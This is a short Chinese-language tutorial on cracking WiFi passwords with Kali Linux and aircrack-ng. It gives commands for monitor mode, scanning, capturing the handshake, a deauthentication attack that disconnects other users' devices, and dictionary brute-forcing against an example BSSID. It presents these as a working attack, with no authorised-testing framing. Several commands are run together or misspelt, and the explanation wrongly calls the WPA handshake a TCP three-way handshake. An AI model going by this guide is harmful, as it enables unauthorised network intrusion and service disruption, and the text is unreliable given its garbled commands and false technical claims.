所需工具:Kali Linux系统、无线网卡(免驱动)
需要用到的命令:
#查看网卡是否支持监听模式
airmon-ng
#开启网卡监听
airmon-ng start 网卡名
#扫描附近WiFi
airodump-ng 网卡名
#抓取握手包
airodump-ng --bssid WiFi的BSSID -c 信道频率 -w 抓包存储的路径 网卡名
#攻击已连接设备,使其掉线
aireplay-ng -0信道频率-a WiFi的BSSID -c 连接到WiFi的mac地址 网卡名
#字典爆破
aircrack-ng -w 密码字典 握手包路径
具体操作步骤:
步骤1:
插入无线网卡连接到Kali Linux
输入ifconfig查看是否有网卡信息
步骤2:
输入airmon-ngstart wlan0开启监听模式
注意:开启后 网卡名字变成了wlan0mon
步骤3:
输入airodump-ngwlan0mon扫描附近WiFi
步骤4:
输入airodump-ng--bassid94:63:72:81:ED:CF-c11-whack wlan0mon开始抓包
注意:若抓不到,可以攻击已经连接的设备使其掉线,设备会再自动连接,并在这个自动连接过程中会进行三次握手,会发出TCP包(里面包含加密的密码数据),我方伪装成WiFi热点去盗窃该数据包。我方盗窃后可用字典穷举法暴力破解加密的WiFi密码。(数据包里面的密码是哈希值加密的,哈希值加密只能正向)
输入aireplay-ng-011-a94:63:72:81:ED:CF-cA4:50:46:E5:73:0Cwlan0mon开始攻击
注意:密码字典可以到网上下载,也可以自己生成
步骤5:
输入aircrack-ng-w/root/pass.txt /root/hack-01.cap开始暴力破解
>>> 密码破解成功 <<<